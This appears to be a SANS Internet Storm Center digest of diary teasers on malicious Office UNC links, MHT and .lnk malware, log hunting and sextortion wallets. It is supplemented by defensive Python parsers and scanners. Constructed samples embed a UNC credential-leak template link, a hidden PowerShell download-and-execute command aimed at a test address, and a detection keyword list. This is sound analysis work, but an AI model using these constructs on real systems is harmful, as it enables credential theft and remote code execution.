SANS Internet Storm Center - Cooperative Cyber Security Monitor
As a consultant who does lots of network "stuff", I tend to build SSL VPN access for lots of clients. And a few times per year, I get the "our certificate has just expired" call from one client or another.
Certificate Transparency is a program that we've all heard about, but might not have had direct contact with. We do hear about it from time to time, for instance when Google (or someone else) busts a CA for generating certificates that should not exist (which is what eventually led to the Symantec CA implosion event...). I kinda knew about it mostly from mentions in the ISC Stormcast.
=============== Rob VandenBrink Compugen
Looking back at the story I posted two weeks ago, on getting target users to leak credentials using malicious UNC links in Office (or other) documents ( https://isc.sans.edu/forums/diary/24062/ ), how would you actually identify a malicious document of this type? After a bit of digging, it turns out that there are a few ways to do this.
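One way to do it, as an added example rather than code from the diary: treat the document as the OOXML zip it is and look in every XML and .rels part for UNC (\\host\share) or file:// references and for relationships whose TargetMode is External. A well-known place for this trick is the attachedTemplate relationship in word/_rels/settings.xml.rels, which Word resolves (and authenticates to) when the document opens. The sample package below is constructed inline for the demonstration; the attacker host 203.0.113.10 is a hypothetical TEST-NET address.

```python
import io
import re
import zipfile

# Hypothetical attacker host for the constructed sample (RFC 5737 test range).
UNC_HOST = "203.0.113.10"

# UNC and file:// references inside OOXML parts (XML and .rels files).
UNC_RE = re.compile(r'\\\\[\w.\-]+\\[^\s"<>]*')
FILE_URL_RE = re.compile(r'file:/{2,4}[^\s"<>]+', re.I)
# Any relationship that points outside the package.
EXTERNAL_REL_RE = re.compile(r'<Relationship\b[^>]*\bTargetMode="External"[^>]*>', re.I)
TARGET_RE = re.compile(r'\bTarget="([^"]*)"')


def build_sample_docx(malicious=True):
    """Constructed minimal .docx-like package (not a real sample).

    The malicious variant points the attached-template relationship at a
    UNC share, so Word will try to fetch it and authenticate to that host.
    """
    if malicious:
        target = "\\\\" + UNC_HOST + "\\share\\template.dotm"
    else:
        target = "http://example.test/template.dotm"
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<w:document/>")
        z.writestr("word/settings.xml",
                   '<w:settings><w:attachedTemplate r:id="rId1"/></w:settings>')
        z.writestr("word/_rels/settings.xml.rels",
                   '<Relationships><Relationship Id="rId1" '
                   'Type="http://schemas.openxmlformats.org/officeDocument/2006/'
                   'relationships/attachedTemplate" '
                   'Target="' + target + '" TargetMode="External"/></Relationships>')
    return buf.getvalue()


def scan_ooxml(data):
    """Return (part_name, kind, value) findings for every XML/.rels part of a package."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for name in z.namelist():
            if not name.lower().endswith((".xml", ".rels")):
                continue
            text = z.read(name).decode("utf-8", errors="replace")
            for m in UNC_RE.finditer(text):
                findings.append((name, "unc", m.group(0)))
            for m in FILE_URL_RE.finditer(text):
                findings.append((name, "file_url", m.group(0)))
            for rel in EXTERNAL_REL_RE.finditer(text):
                t = TARGET_RE.search(rel.group(0))
                findings.append((name, "external_rel", t.group(1) if t else ""))
    return findings


def is_suspicious(findings):
    """UNC and file:// references are the credential-leak trigger; flag those."""
    return any(kind in ("unc", "file_url") for _, kind, _ in findings)


if __name__ == "__main__":
    for hit in scan_ooxml(build_sample_docx()):
        print(hit)
```

The same scan applies to .xlsx and .pptx, since they share the package layout; hyperlinks, INCLUDEPICTURE fields and OLE object relationships are other parts where an external target can hide, which is why the scanner reports every External relationship and not only the template one.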
In his diary entry "Malware Delivered Through MHT Files", Xavier shows some malicious VBA code with obfuscated strings.
For many years I've observed requests for the page license.php on my webservers, from various IPs and with various User Agent strings:
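To pull these requests out of a webserver log and see who is asking for them, here is an added example (not part of the diary) that parses combined-format access log lines and groups hits on license.php by source IP and User Agent. The log lines are constructed for the demonstration, with RFC 5737 addresses and made-up user agents; one deliberately unparsable line shows that malformed input is counted rather than crashing the scan.

```python
import re
from collections import Counter

# Apache/nginx "combined" log format.
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)(?: (?P<proto>[^"]+))?" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
    r'(?: "(?P<referer>[^"]*)" "(?P<ua>[^"]*)")?')

# Constructed sample log lines (not taken from the author's servers).
SAMPLE_LOG = """\
198.51.100.7 - - [10/Sep/2018:10:01:02 +0000] "GET /license.php HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows NT 6.1; rv:52.0)"
203.0.113.44 - - [10/Sep/2018:10:01:09 +0000] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64)"
198.51.100.7 - - [10/Sep/2018:10:03:15 +0000] "GET /license.php?x=1 HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows NT 6.1; rv:52.0)"
192.0.2.33 - - [10/Sep/2018:11:17:40 +0000] "GET /blog/license.php HTTP/1.0" 404 209 "-" "python-requests/2.18.4"
this line is not a log entry
"""


def parse_line(line):
    """Return the named fields of one combined-format line, or None if it does not parse."""
    m = COMBINED_RE.match(line)
    return m.groupdict() if m else None


def hunt_path(lines, filename="license.php"):
    """Count requests whose path ends in `filename` (in any directory, query string
    ignored), grouped by source IP and by User Agent."""
    by_ip, by_ua, unparsed = Counter(), Counter(), 0
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            if line.strip():
                unparsed += 1
            continue
        path = rec["path"].split("?", 1)[0]
        if path.rsplit("/", 1)[-1].lower() == filename:
            by_ip[rec["ip"]] += 1
            by_ua[rec["ua"] or "-"] += 1
    return {"by_ip": by_ip, "by_ua": by_ua, "unparsed": unparsed}


if __name__ == "__main__":
    result = hunt_path(SAMPLE_LOG.splitlines())
    print(result["by_ip"].most_common())
    print(result["by_ua"].most_common())
```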
This diary is an update to Sextortion - Follow the Money, which tracks some of the BTC addresses related to the Sextortion campaign that is still in the wild but seemingly tailing off at this time.
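Following the money starts with pulling the addresses out of the mails and making sure they are real addresses before querying a block explorer. The example below is added here and is not the diary's own code: it extracts legacy (base58check) Bitcoin address candidates from free text and validates each one by recomputing the double-SHA256 checksum. The mail text is constructed; the first address in it is the well-known genesis-block address, used only because its checksum is valid, and the second is that address with one character changed. Bech32 "bc1..." addresses are out of scope for this snippet.

```python
import hashlib
import re

B58_ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"
# Legacy P2PKH ("1...") and P2SH ("3...") addresses: 26 to 35 base58 characters.
BTC_ADDR_RE = re.compile(r"\b[13][a-km-zA-HJ-NP-Z1-9]{25,34}\b")


def b58decode(s):
    """Decode a base58 string to bytes, preserving leading zero bytes."""
    n = 0
    for ch in s:
        idx = B58_ALPHABET.find(ch)
        if idx < 0:
            raise ValueError("invalid base58 character: %r" % ch)
        n = n * 58 + idx
    body = n.to_bytes((n.bit_length() + 7) // 8, "big") if n else b""
    # Each leading '1' encodes a single leading zero byte.
    pad = len(s) - len(s.lstrip("1"))
    return b"\x00" * pad + body


def is_valid_btc_address(s):
    """Base58check: 1 version byte + 20-byte hash + 4-byte checksum = 25 bytes."""
    try:
        raw = b58decode(s)
    except ValueError:
        return False
    if len(raw) != 25:
        return False
    payload, checksum = raw[:21], raw[21:]
    digest = hashlib.sha256(hashlib.sha256(payload).digest()).digest()
    return digest[:4] == checksum


def extract_btc_addresses(text):
    """Return (valid, rejected) lists of address candidates found in free text."""
    valid, rejected = [], []
    for cand in BTC_ADDR_RE.findall(text):
        (valid if is_valid_btc_address(cand) else rejected).append(cand)
    return valid, rejected


# Constructed sample in the style of the sextortion mails (not a real mail).
SAMPLE_MAIL = """\
I know your password. Send $700 to my bitcoin address:
1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa
(Copy-paste it, it is case sensitive.) Backup: 1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNb
You have 24 hours.
"""

if __name__ == "__main__":
    ok, bad = extract_btc_addresses(SAMPLE_MAIL)
    print("valid:", ok)
    print("rejected (bad checksum):", bad)
```

Rejecting checksum failures matters when scraping addresses at scale: a typo, a line-wrapped address or an OCR error otherwise turns into a phantom wallet in the tracking spreadsheet.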
What are MHT files? Microsoft is a wonderful source of multiple file formats. MHT files are web page archives. Usually, a web page is based on a piece of HTML code with links to external resources, images and other media. MHT files contain all the data related to a web page in a single place and are therefore very useful for archiving pages. Also called MHTML (MIME Encapsulation of Aggregate HTML Documents), they are encoded like email messages, using MIME parts.
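Because an MHT file is just a MIME message, Python's standard email parser takes it apart without any special tooling. The example below is added here and is not code from the diary: it lists every part of an MHT with its content type, Content-Location and decoded payload, then flags the parts a web archive should not normally carry. It assumes the "ActiveMime" magic that Office uses at the start of the container part (typically named editdata.mso) holding a document's VBA project; that marker is an assumption of this example, not something the diary text spells out. The MHT is constructed inline and carries a harmless dummy blob in place of a real macro container.

```python
import base64
import email
from email import policy

# Assumed marker: Office's macro container inside an MHT starts with this string.
ACTIVEMIME_MAGIC = b"ActiveMime"


def _b64(data):
    return base64.b64encode(data).decode("ascii")


# Constructed MHT sample (not a real malware sample): an HTML part plus an
# embedded, base64-encoded blob shaped like an ActiveMime container.
SAMPLE_MHT = """\
Subject: Invoice
MIME-Version: 1.0
Content-Type: multipart/related; type="text/html"; boundary="----=_NextPart_01D4.ABC"

------=_NextPart_01D4.ABC
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: quoted-printable
Content-Location: file:///C:/Invoice.htm

<html><body><p>Please enable editing to view this invoice.</p></body></html>
------=_NextPart_01D4.ABC
Content-Type: application/x-mso
Content-Transfer-Encoding: base64
Content-Location: file:///C:/Invoice_files/editdata.mso

%s
------=_NextPart_01D4.ABC--
""" % _b64(ACTIVEMIME_MAGIC + b"\x00" * 6 + b"\x01\x00\x00\x00" + b"\x00" * 32)


def list_parts(mht_text):
    """Return one dict per leaf MIME part, with the payload already decoded."""
    msg = email.message_from_string(mht_text, policy=policy.default)
    parts = []
    for part in msg.walk():
        if part.is_multipart():
            continue
        parts.append({
            "content_type": part.get_content_type(),
            "content_location": part.get("Content-Location"),
            "encoding": part.get("Content-Transfer-Encoding"),
            "data": part.get_payload(decode=True) or b"",
        })
    return parts


def flag_suspicious(parts):
    """Return (content_location, reasons) for parts that warrant a closer look."""
    hits = []
    for p in parts:
        reasons = []
        if p["data"].startswith(ACTIVEMIME_MAGIC):
            reasons.append("ActiveMime container (can hold a VBA project)")
        if p["content_type"] in ("application/x-mso", "application/octet-stream"):
            reasons.append("binary part inside a web archive")
        if reasons:
            hits.append((p["content_location"], reasons))
    return hits


if __name__ == "__main__":
    parts = list_parts(SAMPLE_MHT)
    for p in parts:
        print(p["content_type"], p["content_location"], len(p["data"]), "bytes")
    print(flag_suspicious(parts))
```

Once a flagged part is written to disk, the usual VBA tooling (olevba and friends) can take over on the decoded container.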
[Disclaimer: This article deals with legacy IPv4 networks. IPv6 has cleaned up some of the fragmentation issues, and it looks like IPv4 is backporting some of these changes]
Microsoft released patches for 61 vulnerabilities. In addition, we got two advisories. One for the usual update for Flash, and one for a Windows DoS vulnerability.
Reader Matt was targeted with malware via email, and started analyzing the content of the ZIP file served by the compromised server. It contains a .lnk file. Matt figured out that it launches the following PowerShell command:
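Getting the command line out of a .lnk without opening it is a matter of walking the Shell Link binary format: a 76-byte header whose LinkFlags say which optional structures follow, then the StringData fields (name, relative path, working directory, arguments, icon) in a fixed order, each prefixed with a character count. The example below is added here, not Matt's or the diary's code: it builds a constructed .lnk pointing at powershell.exe with a hidden, bypass, encoded command line (the URL 203.0.113.5 inside it is hypothetical), parses it back, and decodes the -EncodedCommand payload, which PowerShell expects as base64 of UTF-16LE text.

```python
import base64
import struct

# Shell Link header CLSID {00021401-0000-0000-C000-000000000046}, little-endian GUID layout.
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_REL_PATH = 0x01, 0x02, 0x04, 0x08
HAS_WORK_DIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
# StringData sections appear in this fixed order when their flag is set.
STRING_FIELDS = ((HAS_NAME, "name"), (HAS_REL_PATH, "relative_path"),
                 (HAS_WORK_DIR, "working_dir"), (HAS_ARGS, "arguments"),
                 (HAS_ICON, "icon_location"))


def is_lnk(data):
    return (len(data) >= 0x4C and struct.unpack_from("<I", data, 0)[0] == 0x4C
            and data[4:20] == LNK_CLSID)


def parse_lnk(data):
    """Parse the header and StringData of a Shell Link (.lnk) file."""
    if not is_lnk(data):
        raise ValueError("not a shell link file")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    show_command = struct.unpack_from("<I", data, 0x3C)[0]
    off = 0x4C
    if flags & HAS_ID_LIST:        # LinkTargetIDList: u16 size, then the item list
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINK_INFO:      # LinkInfo: u32 total size that includes itself
        off += struct.unpack_from("<I", data, off)[0]
    unicode = bool(flags & IS_UNICODE)
    out = {"show_command": show_command}
    for flag, key in STRING_FIELDS:
        if flags & flag:
            count = struct.unpack_from("<H", data, off)[0]
            off += 2
            nbytes = count * 2 if unicode else count
            out[key] = data[off:off + nbytes].decode("utf-16-le" if unicode else "cp1252")
            off += nbytes
    return out


SUSPICIOUS_TOKENS = ("-nop", "-noprofile", "-w hidden", "-windowstyle hidden",
                     "bypass", "-enc", "iex", "invoke-expression", "downloadstring")


def powershell_indicators(link):
    """Return the suspicious PowerShell switches seen in a parsed link."""
    cmd = (link.get("relative_path", "") + " " + link.get("arguments", "")).lower()
    if "powershell" not in cmd:
        return []
    hits = [t for t in SUSPICIOUS_TOKENS if t in cmd]
    if link["show_command"] == 7:  # SW_SHOWMINNOACTIVE: window opens minimised
        hits.append("show_command=7")
    return hits


def decode_encoded_command(arguments):
    """Decode the payload of -e/-ec/-enc/-EncodedCommand (base64 of UTF-16LE), if present."""
    toks = arguments.split()
    for i, t in enumerate(toks[:-1]):
        t = t.lower()
        if t.startswith("-e") and "-encodedcommand".startswith(t):
            try:
                return base64.b64decode(toks[i + 1], validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def build_sample_lnk(arguments, show_command=7):
    """Constructed .lnk (not Matt's sample): relative path to powershell.exe plus arguments."""
    flags = HAS_REL_PATH | HAS_ARGS | IS_UNICODE
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID, flags, 0x20,
                         0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)

    def sd(s):  # StringData: u16 character count followed by UTF-16LE text
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")

    rel = r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    return header + sd(rel) + sd(arguments)


# Hypothetical command line in the style of such droppers; the URL is a test address.
SAMPLE_COMMAND = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a.ps1')"
SAMPLE_ARGS = ("-NoP -W Hidden -ExecutionPolicy Bypass -Enc "
               + base64.b64encode(SAMPLE_COMMAND.encode("utf-16-le")).decode("ascii"))

if __name__ == "__main__":
    link = parse_lnk(build_sample_lnk(SAMPLE_ARGS))
    print(link["relative_path"], link["arguments"])
    print(powershell_indicators(link))
    print(decode_encoded_command(link["arguments"]))
```

Real samples usually also carry a LinkTargetIDList and LinkInfo block; the parser skips both by their declared sizes, which is what makes the StringData offsets line up.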
I created a video for my diary entry "Using scdbg to analyze shellcode". In this video, I also show how to analyze shellcode with a reverse tcp shell, by setting up a server listening on the appropriate TCP port.